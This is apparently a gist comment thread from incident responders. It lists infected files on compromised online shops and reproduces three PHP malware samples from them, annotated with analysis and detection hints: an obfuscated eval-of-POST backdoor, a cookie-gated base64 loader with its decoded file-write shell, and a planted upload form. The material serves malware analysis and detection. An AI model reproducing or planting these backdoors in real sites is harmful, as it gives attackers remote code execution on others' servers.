This is a short list of infected files from domains on @gwillem's list of compromised online shops.
**hacked-stores-in-last-48hrs.txt**
https://gist.github.com/gwillem/e7c77b77d508928ad67860970c366cae | |
If you have to deal with this, it may help you find infected files.
./html/devsys/adminerc2q.php | |
./html/devsys/media/dhl/info.php | |
./html/livesys/media/dhl/info.php | |
./html/livesys/skin/skin.php | |
./html/magento/media/dhl/info.php | |
./html/wp-includes/shortcodes.php | |
/html/wp-includes/locale.php | |
./html/wp-includes/SimplePie/Cache/Base.php | |
./html/wp-content/themes/customizr/comments.php | |
./html/wp-content/themes/virtue/woocommerce/single-product/price.php | |
./html/wp-content/themes/virtue/7567567567.php | |
./html/wp-content/themes/virtue/page-blog.php | |
./html/wp-content/themes/virtue/404.php | |
./html/wp-content/themes/catch-kathmandu/sidebar-header-top.php | |
./html/includes/.src/Mage/Archive/css.php | |
./html/includes/.src/Mage/Centinel/dump.php | |
./html/includes/.src/Mage/PaypalUk/defines.php | |
./html/includes/.src/Magpleasure/Filesystem/db.php | |
./html/includes/.src/Varien/Pear/info.php | |
./html/includes/.src/Zend/Gdata/diff.php | |
./html/includes/.src/Zend/Http/sql.php | |
./html/includes/.src/Zend/Measure/db.php | |
./html/includes/.src/Zend/Paginator/sql.php | |
./html/lib/Zend/Controller/include.php | |
./html/lib/Zend/Currency/css.php | |
./html/lib/Zend/OpenId/Extension/template.php | |
./html/skin/frontend/{customfolder}/header.php | |
./html/var/package/tmp/article.php | |
./html/{customfolder}/media/dhl/info.php | |
./html/{customfolder}/skin/omo.php | |
./html/{customfolder}/skin/skins2.php | |
./html/magento/skin/Signedint.php | |
./html/magento/skin/install/default/install.php | |
./html/magento/skin/test.php | |
./html/magento/var/package/pack.php | |
./html/piwik/tmp/cache/tracker/PluginTranslations-de-4c5c90167f7f8091f2885497b017f3d6.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms/Edit.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Webforms.php | |
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php | |
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php | |
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php | |
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms_Edit.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Webforms.php | |
./html/media/dhl/info.php | |
./html/skin/error.php | |
./html/skin/ren1.php | |
./html/typo3/db2.php | |
./html/typo3/index.php | |
./html/typo3/sitemap.php | |
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx |
I will try to get the contents of these files
./html/wp-includes/SimplePie/Cache/Base.php
// Injected one-liner prepended to a legitimate WordPress file (SimplePie/Cache/Base.php).
// "stop_" re-indexed as [4][3][2][0][1] spells "_post"; strtoupper() turns it into "_POST",
// so ${$s20} is a variable-variable lookup of the $_POST superglobal. The string assembly
// presumably exists so the literal "$_POST" / "eval($_POST" never appears in the file and
// simple string-matching scanners miss it. Net effect: eval() of whatever arrives in POST
// parameter 'q170405' — that parameter name is an IoC worth searching access logs and
// other files for. The trailing "?><?php" closes the injected block and re-opens PHP for
// the original file body; a file whose first "<?php" is preceded by code, or that carries
// two opening tags at the top, is itself a useful signal when sweeping a tree.
$qV="stop_";$s20 = strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q170405'])){eval(${$s20}['q170405']);}?><?php
// Decoded equivalent of the line above (as noted in the original gist):
// if (isset($_POST['q170405'])) {
// eval($_POST['q170405']);
// }
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
// Backdoor loader. The two function names are built by string concatenation so the
// literals "base64_decode" and "create_function" never appear in the file (32*2 == 64).
// create_function() was removed in PHP 8.0, so this sample can only execute on PHP <= 7.x;
// the file also carries a .phpx extension, so it only runs if the web server maps that
// extension to the PHP handler — TODO confirm the handler configuration on the affected host.
$b='ba'.'se'.(32*2).'_d'.'eco'.'de'; // base64_decode
$f='cr'.'ea'.'te_fu'.'nc'.'ti'.'on'; // create_function
// $c receives the decoded PHP source reproduced in the block comment below.
$c=$b("JHBhc3MgPSAnYTYxYWZhMDdjMDMzMDBlMjAwNDhkNjQ0MTkyNWZkYjUnOw0KJGIgPSAnYicuJ2FzJy4nZTYnLic0X2QnLidlYycuJ29kZSc7DQokZnAgPSAnZmlsJy4nZV9wJy4ndXRfYycuJ29udCcuJ2VudCcuJ3MnOw0KJHNkID0gJ3NjJy4nYW5kJy4naXInOw0KJGN3ZCA9ICdnZScuJ3RjJy4nd2QnOw0KJG0gPSAnbScuJ2QnLigyKzMpOw0KDQppZiAoIWlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSkgew0KICAgIG5vdF9mb3VuZCgpOw0KfSBlbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSAmJiAkbSgkX0NPT0tJRVsnc3RvcmFnZV9sb2NhbF9wcmFnbWEnXSkgPT0gJHBhc3MpIHsNCiAgICBlY2hvICRjd2QoKTsNCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydkaXInXSkpIHsNCiAgICAgICAgcHJpbnRfcigkc2QoJF9SRVFVRVNUWydkaXInXSkpOw0KICAgIH0NCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydhbGFza2EnXSkpIHsNCiAgICAgICAgQCRmcCgkX1JFUVVFU1RbJ2FsYXNrYSddLCAkYigkX1JFUVVFU1RbJ2NvZGUnXSkpOw0KICAgIH0gICAgDQp9DQoNCmZ1bmN0aW9uIG5vdF9mb3VuZCgpDQp7DQogICAgaGVhZGVyKCdIVFRQLzEuMCA0MDQgTm90IEZvdW5kJyk7DQogICAgZGllKHByaW50KCdOb3QgRm91bmQnKSk7DQp9");
// Decoded payload (added by the gist author for analysis). What the decoded lines do:
// - Cookie 'storage_local_pragma' is the access gate: when it is missing, or its md5()
//   does not match the embedded hash, the script sends "HTTP/1.0 404 Not Found" and
//   dies, so probes and availability checks see a dead URL rather than a shell.
// - With the expected cookie it echoes getcwd(), print_r()s a scandir() of
//   $_REQUEST['dir'], and writes base64-decoded $_REQUEST['code'] to the path given in
//   $_REQUEST['alaska'] (failures hidden with @) — an arbitrary file write.
// Detection hints grounded in these lines: the cookie name, the request parameter names
// 'dir' / 'alaska' / 'code', and access-log entries for this path that return 404 while
// carrying a cookie — a legitimate 404 would not be preceded by a cookie-gated login.
/**
$pass = 'a61afa07c03300e20048d6441925fdb5';
$b = 'b'.'as'.'e6'.'4_d'.'ec'.'ode';
$fp = 'fil'.'e_p'.'ut_c'.'ont'.'ent'.'s';
$sd = 'sc'.'and'.'ir';
$cwd = 'ge'.'tc'.'wd';
$m = 'm'.'d'.(2+3);
if (!isset($_COOKIE['storage_local_pragma'])) {
not_found();
} elseif (isset($_COOKIE['storage_local_pragma']) && $m($_COOKIE['storage_local_pragma']) == $pass) {
echo $cwd();
if (isset($_REQUEST['dir'])) {
print_r($sd($_REQUEST['dir']));
}
if (isset($_REQUEST['alaska'])) {
@$fp($_REQUEST['alaska'], $b($_REQUEST['code']));
}
}
function not_found()
{
header('HTTP/1.0 404 Not Found');
die(print('Not Found'));
}
**/
// The body handed to create_function is '};' . CODE . '{'. create_function() wraps its
// argument in an anonymous function body, so the leading '};' closes that (empty) function
// and CODE is compiled and run at once, while the trailing '{' balances the wrapper's own
// closing brace. The payload therefore executes at include time without an explicit eval()
// ever appearing in the file — which is why obfuscated "create_function" strings are a
// reliable thing to hunt for in a compromised tree.
$f('', '};'.$c.'{'); // create_function('', };'.###CODE_ABOVE###.'{')
I also found a 404.php, which is basically a simple file-upload script (like the one above) — maybe these files were uploaded with these scripts.
/html/wp-content/themes/virtue/404.php
<?php
// Unauthenticated upload form planted as a theme's 404.php. Presumably chosen because the
// name blends in with a legitimate template and the file is reachable directly by URL
// (and, if it replaced the theme's real template, whenever WordPress renders a not-found
// page) — confirm against the theme's original 404.php. There is no session or auth check,
// no extension, MIME or size enforcement ($maxfile is assigned but never read), and the
// client-supplied file name is used verbatim as the destination path.
if(isset($_POST['Submit'])){
$filedir = "";
// Empty prefix: the destination is relative, i.e. the upload lands in the process's
// current working directory (normally alongside this script).
$maxfile = '2000000';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
// @ hides move_uploaded_file() failures; the "Done" line below is printed regardless,
// so the response text is not evidence that a file was actually written.
@move_uploaded_file($userfile_tmp, $abod);
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
// Any request without a 'Submit' field (e.g. a plain GET) renders the bare form.
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
// Detection: a theme 404.php that differs from the theme's shipped template, POST requests
// with multipart/form-data to a 404.php, and new files appearing in the theme directory
// shortly after such a request.
?>
For future reference, I have included these and many other malware samples in the Magento Malware Scanner
Great! Would you mind sharing some content, such as
./html/wp-includes/SimplePie/Cache/Base.php
or ./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
?